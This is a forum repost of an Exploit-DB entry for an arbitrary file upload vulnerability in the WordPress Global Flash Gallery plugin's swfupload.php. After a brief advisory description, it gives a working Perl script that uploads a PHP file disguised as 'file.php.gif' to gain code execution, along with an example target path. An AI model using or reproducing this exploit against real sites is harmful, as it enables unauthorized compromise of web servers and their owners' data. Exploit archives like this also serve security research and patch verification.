Exploit WordPress Plugin Global Flash Gallery - 'swfupload.php' Arbitrary File Upload

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
39059
Проверка EDB
  1. Пройдено
Автор
ASHIYANE DIGITAL SECURITY TEAM
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
null
Дата публикации
2014-01-18
WordPress Plugin Global Flash Gallery - 'swfupload.php' Arbitrary File Upload
Код:
source: https://www.securityfocus.com/bid/65060/info

The Global Flash Gallery plugin for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because it fails to properly validate file extensions before uploading them.

An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application. 

#! /usr/bin/perl
  use LWP;
  use HTTP::Request::Common;
  
  my ($url, $file) = @ARGV;
  
  my $ua = LWP::UserAgent->new();
  my $req = POST $url,
    Content_Type => 'form-data',
    Content =>    [
  name => $name,
  galleryselect => 1, # Gallery ID (popup.php)
  Filedata => [ "$file", "file.php.gif",  Content_Type =>
  'image/gif' ]
            ];
  my $res = $ua->request( $req );
  if( $res->is_success ) {
    print $res->content;
  } else {
    print $res->status_line, "\n";
  }

--------------------
Example URI:
--------------------
http://www.example.com/wp-content/plugins/global-flash-galleries/swfupload.php
 
Источник
www.exploit-db.com

Похожие темы